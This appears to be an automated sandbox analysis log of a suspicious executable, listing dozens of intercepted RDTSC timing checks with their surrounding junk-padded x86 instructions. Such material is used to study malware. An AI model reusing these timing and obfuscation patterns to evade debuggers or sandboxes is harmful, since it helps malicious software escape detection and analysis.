                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1119DC5 second address: 1119DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F99A452D6D8h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F703 second address: 111F707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F707 second address: 111F710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F710 second address: 111F770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A4D6816Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c je 00007F99A4D68168h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F99A4D68176h 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c jp 00007F99A4D68166h 0x00000022 jmp 00007F99A4D68178h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 popad 0x0000002a jl 00007F99A4D68172h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F770 second address: 111F776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FA23 second address: 111FA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FA27 second address: 111FA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108CEB6 second address: 108CED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F99A4D68174h 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FB7B second address: 111FB7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FB7F second address: 111FB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F99A4D68166h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111FB8F second address: 111FB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120223 second address: 1120233 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007F99A4D68166h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120233 second address: 1120237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1120A61 second address: 1120A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F99A4D6816Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111F410 second address: 111F429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1122EF9 second address: 1122F13 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F99A4D6816Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c je 00007F99A4D68176h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1123062 second address: 112307A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnl 00007F99A452D6C6h 0x0000000b jng 00007F99A452D6C6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112307A second address: 1123084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F99A4D68166h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1123084 second address: 112308A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B2CA second address: 108B2CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B2CE second address: 108B2DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108B2DD second address: 108B2E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112771A second address: 112776F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F99A452D6D8h 0x0000000e jmp 00007F99A452D6D1h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 popad 0x00000017 jbe 00007F99A452D6E4h 0x0000001d jnl 00007F99A452D6CCh 0x00000023 push esi 0x00000024 jmp 00007F99A452D6CAh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D143 second address: 112D15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A4D6816Eh 0x00000009 jnl 00007F99A4D68166h 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D15C second address: 112D16C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99A452D6CBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D2B3 second address: 112D2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 js 00007F99A4D68166h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1B57 second address: 10E1B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E1B5B second address: 10E1BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov cx, 80FBh 0x0000000e mov ebx, dword ptr [ebp+12494A51h] 0x00000014 mov edi, dword ptr [ebp+122D3377h] 0x0000001a add eax, ebx 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F99A4D68168h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 cld 0x00000037 jbe 00007F99A4D6816Ch 0x0000003d mov edi, dword ptr [ebp+122D1BF6h] 0x00000043 push eax 0x00000044 jnc 00007F99A4D6817Eh 0x0000004a mov dword ptr [esp], eax 0x0000004d push 00000000h 0x0000004f push esi 0x00000050 call 00007F99A4D68168h 0x00000055 pop esi 0x00000056 mov dword ptr [esp+04h], esi 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc esi 0x00000063 push esi 0x00000064 ret 0x00000065 pop esi 0x00000066 ret 0x00000067 mov cx, bx 0x0000006a push 00000004h 0x0000006c xor dl, 00000023h 0x0000006f push eax 0x00000070 push esi 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F99A4D68170h 0x00000078 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131786 second address: 113178E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131A1D second address: 1131A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007F99A4D6816Ah 0x0000000b pushad 0x0000000c jne 00007F99A4D68166h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131A35 second address: 1131A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F99A452D6C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131CCA second address: 1131CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131CCE second address: 1131CDC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99A452D6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131CDC second address: 1131CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131CE2 second address: 1131CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F703 second address: 109F707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F707 second address: 109F731 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F99A452D6D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F99A452D6C8h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F731 second address: 109F737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F737 second address: 109F756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F99A452D6D5h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F756 second address: 109F771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F99A4D6816Ah 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F771 second address: 109F78D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134960 second address: 113498B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jc 00007F99A4D68166h 0x0000000d jmp 00007F99A4D6816Fh 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F99A4D6816Ah 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113498B second address: 1134995 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99A452D6C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E035 second address: 113E04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F99A4D6816Eh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E04C second address: 113E052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E052 second address: 113E068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F99A4D68166h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F99A4D68166h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C6D4 second address: 113C6E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F99A452D6C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113C6E0 second address: 113C6F8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99A4D68173h 0x00000008 jmp 00007F99A4D6816Dh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113CC9D second address: 113CCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113D246 second address: 113D24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113D24A second address: 113D253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DD53 second address: 113DD6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A4D6816Dh 0x00000009 jmp 00007F99A4D6816Ah 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11468A7 second address: 11468C8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99A452D6CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F99A452D6CFh 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10954C2 second address: 10954E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F99A4D68166h 0x0000000a pop edx 0x0000000b jmp 00007F99A4D68170h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10954E0 second address: 1095506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F99A452D6C6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F99A452D6D7h 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145BA3 second address: 1145BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68179h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145BC4 second address: 1145BC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114611A second address: 1146124 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99A4D68166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146124 second address: 1146139 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F99A452D6C6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146139 second address: 1146149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11462D2 second address: 11462D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11462D6 second address: 11462E0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99A4D68166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11462E0 second address: 1146314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F99A452D6CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99A452D6D2h 0x00000013 jmp 00007F99A452D6CEh 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146478 second address: 114647C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114647C second address: 114649D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F99A452D6D9h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F1D5 second address: 114F1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F99A4D68166h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DA4A second address: 114DA4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DBBA second address: 114DBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F99A4D68172h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DD1C second address: 114DD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F99A452D6CAh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F99A452D6C6h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DD39 second address: 114DD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DD3D second address: 114DD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DD43 second address: 114DD4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F99A4D68166h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E070 second address: 114E07C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99A452D6C6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E07C second address: 114E09C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99A4D68176h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E09C second address: 114E0A6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99A452D6C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114E1E0 second address: 114E1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CE66 second address: 114CE80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CE80 second address: 114CE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156E05 second address: 1156E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A452D6CEh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11570D6 second address: 11570E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F99A4D68168h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11570E4 second address: 11570EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11570EA second address: 1157107 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99A4D68166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pop edi 0x0000000f jnp 00007F99A4D68166h 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157107 second address: 115710B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11589AA second address: 11589DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F99A4D68173h 0x0000000d popad 0x0000000e pushad 0x0000000f jnp 00007F99A4D68166h 0x00000015 jnl 00007F99A4D68166h 0x0000001b pushad 0x0000001c popad 0x0000001d jl 00007F99A4D68166h 0x00000023 popad 0x00000024 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11589DC second address: 11589E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F99A452D6C6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115D47D second address: 115D481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1162CAD second address: 1162CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1162CB3 second address: 1162CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11690B8 second address: 11690BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168A8A second address: 1168A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168A8E second address: 1168A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F99A452D6C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168A9E second address: 1168AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1168BBE second address: 1168BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
